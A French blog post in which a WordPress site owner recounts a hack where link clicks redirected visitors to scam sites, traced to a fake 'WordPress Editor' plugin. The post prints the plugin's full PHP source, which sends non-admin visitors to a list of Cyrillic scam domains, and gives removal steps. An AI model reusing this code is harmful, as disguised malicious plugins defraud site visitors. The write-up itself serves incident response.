Piratage du site

Facebooktwitterredditpinterestlinkedintumblr

Plusieurs de mes sites réalisés à l’aide de la plateforme WordPress ont été attaqués cette semaine, probablement en raison d’une faille de sécurité chez l’hébergeur que j’utilise (OVH), qui s’est dégagé de toute responsabilité. Les sites attaqués ont présenté le comportement suivant:

  • Lorsque vous accédez pour la première fois à une page du site, elle s’ouvre parfaitement et les liens sont parfaits. Si vous survolez les liens, les adresses sont correctes.
  • En cliquant sur un lien, l’utilisateur est dirigé vers un site frauduleux:

site frauduleux

 

Le fournisseur en question a affirmé avoir passé un outil d’analyse sur les domaines qui ont été compromis et n’a trouvé aucun fichier malveillant, ce qui m’a pris la peine d’analyser quels ou quels fichiers avaient été compromis lors de l’attaque.

Dans un premier temps, j’ai désactivé tous les plugins. Ce faisant, la redirection vers le site d’escroquerie a cessé de se produire, ce qui a réduit la zone à enquêter.

Suivant la même philosophie, j’activais plugin par plugin jusqu’à ce que je vois le moment où l’échec reviendrait. Cela s’est produit lors de l’activation du plugin WordPress Editor , qui, théoriquement, sert à activer l’éditeur WordPress classique, celui qui était utilisé avant la mise à jour de Gutemberg qui a amené le nouvel éditeur sous forme de blocs.

Le malware passe inaperçu dans la liste des plugins car sa description est la même que la description de «l’éditeur classique», induisant une erreur de l’administrateur du site.

L’éditeur classique d’origine est répertorié sous le nom «Classic Editor» ou, en anglais, «Classic Editor». Il se trouve dans le dossier «/ wp-content / plugins / classic-editor» et son code de programmation comporte 954 lignes, ne ressemblant en rien au malware mentionné ci-dessus.

 

Solution:

Cela dit, la solution au problème était très simple: il suffisait de supprimer le plugin WordPress Editor et le fichier plug.php qui était corrompu (pour le savoir il suffit de chercher grâce à filezilla tous les fichiers récent et la bingo un fichier tout neuf alors que j’ai pas fait d’update depuis longtemps.

voici le fichier plug.php :

<?php

/*

Plugin Name: WordPress Editor

Plugin URI: https://wp.com

Description: Enables the WordPress classic editor and the old-style Edit Post screen with TinyMCE, Meta Boxes, etc. Supports the older plugins that extend this screen.

Version: 5.0.0

Author: WordPress

Author URI: https://wp.com

License: GPL2

License URI: https://www.gnu.org/licenses/gpl-2.0.html

*/

// FIX LOGIN PAGE

function is_login_page() {

return in_array($GLOBALS[‘pagenow’], array(‘wp-login.php’, ‘wp-register.php’));

}

function my_function() {

$is_admin = current_user_can( ‘manage_options’ );

$ref = $_SERVER[‘HTTP_REFERER’];

// LINKS (NDLR lien pirates)

$urls = [‘http://xn--80aj6ah1a.xn--p1ai’,’http://xn--e1adtoj.xn--p1ai’,’http://xn--80azck0a.xn--p1ai’,’http://xn--90aixnm.xn--p1ai’,’http://xn--c1ae0ahg.xn--p1ai’,’http://xn--c1ab3awv.xn--p1ai’,’http://xn--e1annge.xn--p1ai’];

$url = «  »;

//$url = ;

if(!$is_admin && !empty($ref) && !is_login_page()){

header(« Location: « .$urls[array_rand($urls)]);

exit();

} else{

}

}

add_action( ‘wp_loaded’, ‘my_function’ );

?>

 

 

Merci au blog: https://blog.lucianoreis.com/2021/03/02/sites-wordpress-direcionando-para-scam/ 

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *

Veux-tu  commencer à construire ton patrimoine ?

Profites pour commencer à t'enrichir et exploites le système grâce à ce premier placement jusqu'à 10%
Je veux moi aussi gagner
* vous souscrivez à la newsletter richesse et finance et vous serez redirigé vers l'opportunité d'investissement du moment (lendix)
close-link

Recevez nos petits secrets pour devenir riche.

Profitez-en pour recevoir gratuitement par mails tout ce que vous avez besoin:
-les bons plans, les informations exclusives, les meilleurs conseils...
J'en profite
close-link